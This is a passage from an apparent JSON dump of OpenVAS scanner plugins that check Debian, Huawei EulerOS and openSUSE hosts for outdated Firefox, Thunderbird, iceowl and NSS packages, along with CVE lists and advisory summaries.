isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:45.5.1-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:22", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for firefox (EulerOS-SA-2017-1012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9893", "CVE-2017-5383", "CVE-2017-5373", "CVE-2016-9904", "CVE-2017-5396", "CVE-2017-5378", "CVE-2016-9899", "CVE-2016-9079", "CVE-2016-9898", "CVE-2017-5380", "CVE-2016-9902", "CVE-2017-5390", "CVE-2016-9897", "CVE-2016-9905", "CVE-2016-9895", "CVE-2016-9900", "CVE-2016-9901", "CVE-2017-5376", "CVE-2017-5375", "CVE-2017-5386"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171012", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1012\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2016-9079\", \"CVE-2016-9893\", \"CVE-2016-9895\", \"CVE-2016-9897\", \"CVE-2016-9898\", \"CVE-2016-9899\", \"CVE-2016-9900\", \"CVE-2016-9901\", \"CVE-2016-9902\", \"CVE-2016-9904\", \"CVE-2016-9905\", \"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:43:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for firefox (EulerOS-SA-2017-1012)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1012\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1012\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'firefox' package(s) announced via the EulerOS-SA-2017-1012 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079, CVE-2016-9893, CVE-2016-9899, CVE-2016-9895, CVE-2016-9897, CVE-2016-9898, CVE-2016-9900, CVE-2016-9901, CVE-2016-9902, CVE-2016-9904, CVE-2016-9905, CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.0.1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:14", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for firefox (EulerOS-SA-2017-1011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9893", "CVE-2017-5383", "CVE-2017-5373", "CVE-2016-9904", "CVE-2017-5396", "CVE-2017-5378", "CVE-2016-9899", "CVE-2016-9079", "CVE-2016-9898", "CVE-2017-5380", "CVE-2016-9902", "CVE-2017-5390", "CVE-2016-9897", "CVE-2016-9905", "CVE-2016-9895", "CVE-2016-9900", "CVE-2016-9901", "CVE-2017-5376", "CVE-2017-5375", "CVE-2017-5386"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171011", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1011\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2016-9079\", \"CVE-2016-9893\", \"CVE-2016-9895\", \"CVE-2016-9897\", \"CVE-2016-9898\", \"CVE-2016-9899\", \"CVE-2016-9900\", \"CVE-2016-9901\", \"CVE-2016-9902\", \"CVE-2016-9904\", \"CVE-2016-9905\", \"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:43:06 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for firefox (EulerOS-SA-2017-1011)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1011\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1011\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'firefox' package(s) announced via the EulerOS-SA-2017-1011 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079, CVE-2016-9893, CVE-2016-9895, CVE-2016-9897, CVE-2016-9898, CVE-2016-9899, CVE-2016-9900, CVE-2016-9901, CVE-2016-9902, CVE-2016-9904, CVE-2016-9905, CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\");\n\n script_tag(name:\"affected\", value:\"'firefox' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.0.1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:34:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Mozilla (openSUSE-SU-2016:3011-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-9070", "CVE-2016-5297", "CVE-2016-9075", "CVE-2016-9065", "CVE-2016-9068", "CVE-2016-5292", "CVE-2016-9063", "CVE-2016-5299", "CVE-2016-9064", "CVE-2016-9071", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5289", "CVE-2016-5295", "CVE-2016-5291", "CVE-2016-5294", "CVE-2016-9074", "CVE-2016-5298", "CVE-2016-9061", "CVE-2016-9072", "CVE-2016-9077", "CVE-2016-9066", "CVE-2016-5293", "CVE-2016-9069", "CVE-2016-9067", "CVE-2016-9078", "CVE-2016-9073", "CVE-2016-9076", "CVE-2016-9062"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851442", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851442\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:57 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-5289\", \"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5292\",\n \"CVE-2016-5293\", \"CVE-2016-5294\", \"CVE-2016-5295\", \"CVE-2016-5296\",\n \"CVE-2016-5297\", \"CVE-2016-5298\", \"CVE-2016-5299\", \"CVE-2016-9061\",\n \"CVE-2016-9062\", \"CVE-2016-9063\", \"CVE-2016-9064\", \"CVE-2016-9065\",\n \"CVE-2016-9066\", \"CVE-2016-9067\", \"CVE-2016-9068\", \"CVE-2016-9069\",\n \"CVE-2016-9070\", \"CVE-2016-9071\", \"CVE-2016-9072\", \"CVE-2016-9073\",\n \"CVE-2016-9074\", \"CVE-2016-9075\", \"CVE-2016-9076\", \"CVE-2016-9077\",\n \"CVE-2016-9078\", \"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Mozilla (openSUSE-SU-2016:3011-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Mozilla'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to Mozilla Firefox 50.0.2, Thunderbird 45.5.1 and NSS 3.16.2\n fixes a number of security issues.\n\n The following vulnerabilities were fixed in Mozilla Firefox (MFSA 2016-89):\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1\n (bmo#1292443)\n\n - CVE-2016-5292: URL parsing causes crash (bmo#1288482)\n\n - CVE-2016-5297: Incorrect argument length checking in Javascript\n (bmo#1303678)\n\n - CVE-2016-9064: Addons update must verify IDs match between current\n and new versions (bmo#1303418)\n\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in\n nsScriptLoadHandler (bmo#1299686)\n\n - CVE-2016-9067: heap-use-after-free in nsINode::ReplaceOrInsertBefore\n (bmo#1301777, bmo#1308922 (CVE-2016-9069))\n\n - CVE-2016-9068: heap-use-after-free in nsRefreshDriver (bmo#1302973)\n\n - CVE-2016-9075: WebExtensions can access the mozAddonManager API and\n use it to gain elevated privileges (bmo#1295324)\n\n - CVE-2016-9077: Canvas filters allow feDisplacementMaps to be applied\n to cross-origin images, allowing timing attacks on them (bmo#1298552)\n\n - CVE-2016-5291: Same-origin policy violation using local HTML file and\n saved shortcut file (bmo#1292159)\n\n - CVE-2016-9070: Sidebar bookmark can have reference to chrome window\n (bmo#1281071)\n\n - CVE-2016-9073: windows.create schema doesn't specify 'format':\n 'relativeUrl' (bmo#1289273)\n\n - CVE-2016-9076: select dropdown menu can be used for URL bar spoofing\n on e10s (bmo#1276976)\n\n - CVE-2016-9063: Possible integer overflow to fix inside XML_Parse in\n expat (bmo#1274777)\n\n - CVE-2016-9071: Probe browser history via HSTS/301 redirect + CSP\n (bmo#1285003)\n\n - CVE-2016-5289: Memory safety bugs fixed in Firefox 50\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR\n 45.5\n\n The following vulnerabilities were fixed in Mozilla NSS 3.26.1:\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in\n divSpoiler (bmo#1293334)\n\n Mozilla Firefox now requires mozilla-nss 3.26.2.\n\n New features in Mozilla Firefox:\n\n - Updates to keyboard shortcuts Set a preference to have Ctrl+Tab cycle\n through tabs in recently used order View a page in Reader Mode by\n using Ctrl+Alt+R\n\n - Added option to Find in page that allows users to limit search to\n whole words only\n\n - Added download protection for a large number of executable file types\n on Windows, Mac and Linux\n\n - Fixed rendering of dashed and dotted borders with rounded corners\n (border-radius)\n\n - Added a built-in Emoji set for operating systems without native Emoji\n fonts\n\n - Blocked versions of libavcodec older than 54.35.1\n\n - additional loc ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Mozilla on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:3011-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-buildsymbols\", rpm:\"MozillaFirefox-buildsymbols~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-devel\", rpm:\"MozillaFirefox-devel~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-common\", rpm:\"MozillaFirefox-translations-common~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-other\", rpm:\"MozillaFirefox-translations-other~50.0.2~131.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-devel\", rpm:\"MozillaThunderbird-devel~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~45.5.1~70.92.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo\", rpm:\"libfreebl3-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3\", rpm:\"libsoftokn3~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo\", rpm:\"libsoftokn3-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs\", rpm:\"mozilla-nss-certs~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo\", rpm:\"mozilla-nss-certs-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo\", rpm:\"mozilla-nss-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debugsource\", 